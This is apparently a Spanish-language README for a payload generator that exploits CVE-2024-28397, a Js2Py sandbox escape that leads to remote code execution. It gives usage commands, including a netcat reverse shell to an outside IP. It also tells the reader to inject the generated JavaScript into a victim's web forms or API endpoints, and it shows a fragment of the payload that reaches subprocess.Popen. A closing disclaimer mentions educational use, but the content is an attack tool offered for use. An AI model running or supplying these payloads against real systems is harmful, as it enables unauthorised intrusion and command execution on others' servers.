
Exploit profesional para CVE-2024-28397: escape de la sandbox de Js2Py que conduce a ejecución remota de código (RCE). Incluye generación modular de payloads.
💡 Análisis en profundidad: Haz clic aquí para leer el informe técnico completo (PDF).
Un generador de payloads profesional para CVE-2024-28397. Esta herramienta genera código JavaScript malicioso diseñado para escapar del sandbox de js2py (versiones <= 0.74) y ejecutar comandos arbitrarios en el sistema objetivo.
Js2PyObject.getOwnPropertyNames para acceder a la clase subprocess.Popen de Python desde el entorno JavaScript.Este script genera el payload de JavaScript exacto necesario para explotar la vulnerabilidad. No necesitas instalar js2py para usar esta herramienta.
Ejecuta el script con el comando que quieras ejecutar en la máquina de la víctima.
# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
Copia la salida generada por la herramienta e inyéctala en la aplicación vulnerable (por ejemplo, un formulario web, un endpoint de API o un archivo de configuración procesado por js2py).
Ejemplo de inyección:
Si un sitio web toma la entrada del usuario y la ejecuta con js2py.eval_js(user_input), pegar el código generado ejecutará tu comando en su servidor.
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
Este software se proporciona únicamente con fines educativos y de investigación en seguridad. El autor no acepta ninguna responsabilidad por el mal uso de este código. Asegúrate de tener permiso explícito antes de probar esto en cualquier sistema que no sea tuyo.